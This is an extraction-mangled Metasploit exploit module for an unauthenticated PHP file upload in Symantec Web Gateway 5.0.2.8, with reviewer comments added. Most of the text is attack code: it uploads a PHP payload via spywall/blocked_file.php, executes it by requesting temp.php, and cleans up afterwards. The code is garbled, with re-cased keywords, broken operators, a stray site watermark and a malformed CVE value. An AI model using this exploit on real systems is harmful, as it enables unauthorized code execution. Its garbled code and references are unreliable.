Require 'msf/core'
# Metasploit exploit module for an unauthenticated PHP file upload in
# Symantec Web Gateway 5.0.2.8 through spywall/blocked_file.php (details in
# the 'Description' string below).
# NOTE(review): this listing is extraction-mangled — keywords and identifiers
# are re-cased and spaces are inserted into operators (`= ~`, `! =`, `<` where
# `<<` is presumably meant) — so it is not valid Ruby as shown. Compare against
# the upstream module before relying on any detail here; the comments below
# describe what the visible lines do, not a verified working module.
Class Metasploit3 <Msf: Exploit: Remote
Rank = ExcellentRanking
# Brings in send_request_raw / send_request_cgi, rhost / rport and target_uri.
Include Msf: Exploit: Remote: HttpClient
# Module metadata: name, description, credits, references, payload constraints,
# target list and disclosure date. These values are string data and are left
# exactly as they appear in the listing.
Def initialize (info = {})
Super (update_info (info,
'Name' => "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability ",
'Description' => % q {
This module exploits a file upload vulnerability found in Symantec Web Gateway's
HTTP service. Due to the incorrect use of file extensions in the upload_file ()
Function, this allows us to abuse the spywall/blocked_file.php file in order
Upload a malicious PHP file without any authentication, which results in arbitrary
Code execution.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Tenable Network security', # Vulnerability Discovery
'Juan vazquez' # Metasploit module
],
# NOTE(review): the CVE value below looks garbled by extraction ('2017-2012'
# is not the usual YYYY-NNNN form) and the OSVDB/BID values look like
# placeholders; verify all three against the ZDI advisory and the vendor
# advisory referenced on the two 'Url' lines, which is also where the fix
# for affected installations is described.
'References '=>
[
['Cve', '2017-2012 '],
['Ossvdb', '123'],
['Bid', '123'],
['Url', 'HTTP: // www.zerodayinitiative.com/advisories/ZDI-12-091'],
['Url', 'HTTP: // www.deletec.com/security_response/securityupdates/detail.jsp? Fid = security_advisory & pvid = security_advisory & year = 2012 & suid = 20120517_00 ']
],
# Payload constraint: the null byte (presumably "\x00" before mangling) is
# excluded from the encoded PHP payload.
'Payload' =>
{
'Badchars' => "\ x00"
},
# Presumably 'DefaultOptions' / 'EXITFUNC' in the original — confirm.
'Defaultopexception' =>
{
'Exitfunction' => "none"
},
'Platform' => ['php'],
'Arch '=> ARCH_PHP,
# Single target; no target-specific options are used anywhere below.
'Targets' =>
[
['Symantec Web Gateway 5.0.2.8 ', {}],
],
'Privileged' => false,
'Disclosuredate' => "May 17 2012 ",
'Defaulttarget' => 0 ))
End
# Fingerprints the host by requesting the login page and matching the HTML
# <title>. Only the product name is checked — no version or patch level — so
# Detected means "looks like Symantec Web Gateway", not "confirmed vulnerable".
# Returns Exploit::CheckCode::Detected or ::Safe.
Def check
Res = send_request_raw ({
'Method' => 'get ',
'Url' => '/spywall/login. php'
})
If res and res. body = ~ /\ <Title \> Symantec Web Gateway \ <\/title \>/
Return Exploit: CheckCode: Detected
Else
Return Exploit: CheckCode: Safe
End
End
# Post-exploitation cleanup: removes the uploaded temp.php once a session is
# established, via the Meterpreter fs API when the session is meterpreter and
# a plain `rm` through the shell otherwise. The path is relative, so removal
# depends on the session's working directory; if it fails the dropped file
# remains on the host.
# NOTE(review): as written the condition uses a single `=` (assignment), which
# would always be truthy; the comparison is presumably `==` upstream — confirm.
Def on_new_session (client)
If client. type = "meterpreter"
# Load stdapi before touching the fs API, unless it is already loaded.
Client. core. use ("stdapi") if not client. ext. aliases. include? ("Stdapi ")
Client. fs. file. rm ("temp. php ")
Else
Client. shell_command_token ("rm temp. php ")
End
End
# Main exploit flow:
#   1. build a multipart/form-data POST imitating the blocked_file.php form,
#      carrying the PHP payload as the "new_image" file part;
#   2. POST it to spywall/blocked_file.php and require HTTP 200 with the
#      stored name (temp.php) echoed in the body;
#   3. GET spywall/images/upload/temp.php so the server executes the payload.
# Defensive note: the observable indicators are a multipart POST to
# blocked_file.php whose file part has a .php filename, followed by a GET of
# images/upload/temp.php; the upload directory being web-executable is the
# root cause, and the vendor advisory referenced above carries the fix.
Def exploit
Uri = target_uri.path
# Ensure the base path ends with a slash (presumably `<<` upstream; the single
# `<` here is an extraction artifact).
Uri <'/' if uri [-1, 1]! = '/'
# NOTE(review): the next line is a watermark from the site this listing was
# copied from, not part of the module; it should be deleted.
Www.2cto.com
Peer = "# {rhost }:# {rport }"
# The client-side filename is randomised, but the server stores the upload as
# temp.php regardless (see the body check and the GET below), so this name
# only shows up in the multipart header and the status messages.
Payload_name = Rex: Text. rand_text_alpha (rand (10) + 5) + '. php'
Before_filename = rand_text_alpha (rand (10) + 5)
After_filename = rand_text_alpha (rand (10) + 5)
# Form parts mirror the fields blocked_file.php expects: a "submitted" flag,
# two filler filename fields, and the file part holding the PHP payload.
Post_data = Rex: MIME: Message. new
Post_data.add_part ("true", nil, nil, "form-data; name = \" submitted \"")
Post_data.add_part (before_filename, "application/octet-stream", nil, "form-data; name = \" before_filename \"")
Post_data.add_part (after_filename, "application/octet-stream", nil, "form-data; name = \" after_filename \"")
Post_data.add_part ("<? Php # {payload. encoded}?> "," Image/gif ", nil," form-data; name = \ "new_image \"; filename = \ "# {payload_name }\"")
Print_status ("# {peer}-Sending PHP payload (# {payload_name })")
Res = send_request_cgi ({
'Method' => 'post ',
'Url' => "# {uri} spywall/blocked_file.php ",
'Ctype '=> "multipart/form-data; boundary =#{ post_data.bound }",
'Data' => post_data.to_s
})
# The upload is treated as successful only when the server answers 200 and
# echoes the stored filename (temp.php) in the body; anything else aborts.
If not res or res. code! = 200 or res. body !~ /Temp. php/
Print_error ("# {peer}-File wasn't uploaded, aborting! ")
Return
End
Print_status ("# {peer}-Executing PHP payload (# {payload_name })")
# Request the stored file so the server executes it.
Res = send_request_cgi ({
'Method' => 'get ',
'Url' => "# {uri} spywall/images/upload/temp. php"
})
# A non-200 response on this request suggests no shell was obtained; the
# status code is printed for debugging. A missing response is not reported.
If res and res. code! = 200
Print_status ("# {peer}-Server returned # {res. code. to_s }")
End
End
End